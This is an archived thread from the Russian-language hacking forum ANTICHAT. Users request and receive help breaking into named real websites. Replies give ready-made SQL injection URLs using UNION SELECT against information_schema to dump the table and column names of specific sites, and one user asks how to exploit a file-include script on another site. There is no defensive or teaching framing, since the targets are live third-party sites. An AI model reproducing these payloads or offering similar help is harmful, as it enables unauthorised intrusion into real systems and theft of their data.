ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.07.2010, 18:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
2597
Репутация:
0
|
|
Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' ORDER BY emissions.sTitre' at line 1
|
|
|
|
10.07.2010, 18:08
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Нажми Ctrl+U на клавиатуре и посмотри.
Press Ctrl+U on your keyboard and see
Благодарю вас, это работа
|
|
|
10.07.2010, 18:44
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
Сообщение от happygirl
happygirl said:
Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27
0_о не понял в чем проблема?
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27+union+sele ct+1,2,3,4,5,concat_ws%280x3a,table_schema,table_n ame,column_name%29+from+information_schema.columns--+
|
|
|
|
10.07.2010, 20:26
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Привет.
Есть сайтик. На шаред хостинге стоит, в другой стране. Работает под управлением самописного движка (сорцев нет).
На сайтике есть один скриптик. Его вызов таков:
http://site/lol.php?p=name
этот скрипт инклюдит файл /pages/name.php (".php" подставляется автоматом).
Еще знаю путь к PHP (мне так кажется, выглядит как /usr/local/nf/php5/lib/php).
Еще кое что есть.
Скриптик, который как-то хитро выполняет запрос. Ему подставляешь число, а он делает выборку из базы (SQL) и выдает ссылку на файл. Если подставить ему, например, -1 в качестве номера, начинает срать кирпичами. Ничего особого там нет, если не считать полного раскрытия путей.
Что можно сделать, дорогие эксперты?
Спасибо.
|
|
|
|
10.07.2010, 20:52
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
По той информации, что ты предоставил, судить о наличии уязвимостей не возможно.
Либо задавай вопрос конкретнее, либо читай статьи.
|
|
|
|
11.07.2010, 05:40
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
http://www.noracom24.eu/image.php?w=200&h=120&id='
|
|
|
|
11.07.2010, 06:08
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от AKYLA
AKYLA said:
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
http://www.noracom24.eu/image.php?w=200&h=120&id='
Код:
Code:
http://www.noracom24.eu/image.php?w=200&h=120&id=1+and+1=2+union+select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29+--+
там в картинке выводится
|
|
|
|
11.07.2010, 06:24
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Seravin
Сенкс, даже не подумал что так может быть...мда тут по ходу никак не поработаешь автоматизировано с ней, с таким выводом (
|
|
|
|
11.07.2010, 14:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,
от этого одни минусы
1. вы не осваиваете sql инъекцию хорошо
2. вы доверяете программу которая может ошибиться
3. и этот взлом даже не можете считать вашим (это чистое мнение)
однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
потом скул даль программу havij которая считается крутой тулзой,и программа не смог раскрутить скул
sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)
вообщем дело ваше, простите за оффтоп(если это оффтоп)
|
|
|
|
11.07.2010, 14:48
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
Провел на форуме:
67694
Репутация:
5
|
|
/showpost.php?p=2243635&postcount=14262
Актуально.
Konqi, иногда надоедают однотипные действия) Хотя самостоятельно лучше, да.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
